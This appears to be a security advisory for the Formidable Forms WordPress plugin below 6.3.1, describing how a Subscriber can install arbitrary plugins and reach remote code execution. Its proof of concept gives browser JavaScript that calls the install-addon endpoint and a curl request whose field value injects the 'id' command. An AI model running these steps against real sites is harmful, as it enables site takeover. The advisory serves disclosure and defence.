Formidable Forms < 6.3.1 - Subscriber+ Remote Code Execution

The plugin does not adequately authorize the user or validate the plugin URL in its functionality for installing add-ons. This allows a user with a role as low as Subscriber to install and activate arbitrary plugins of arbitrary versions from the WordPress.org plugin repository onto the site, leading to Remote Code Execution.

PoC

1. As a Subscriber user, visit /wp-admin/admin.php?page=formidable-welcome 2. Run the following JavaScript code in the browser console: var token = jQuery(‘a.button-primary.frm-button-primary’)[0].href.replace(/^.token=(\w+).$/, ‘$1’); await fetch( /wp-json/frm-admin/v1/install-addon?token=${token}&file;_url=https://downloads.wordpress.org/plugin/wp-upg.2.19.zip ); 3. Note that version 2.19 of the wp-upg plugin has been installed, despite being closed and having a known security vulnerability. Any version of any WordPress.org plugin could be installed here. 4. For RCE with the wp-upg plugin, run the following curl command: curl -i ‘https://SITE_URL/wp-admin/admin-ajax.php?action=upg_datatable&field;=field:exec:id:NULL:NULL’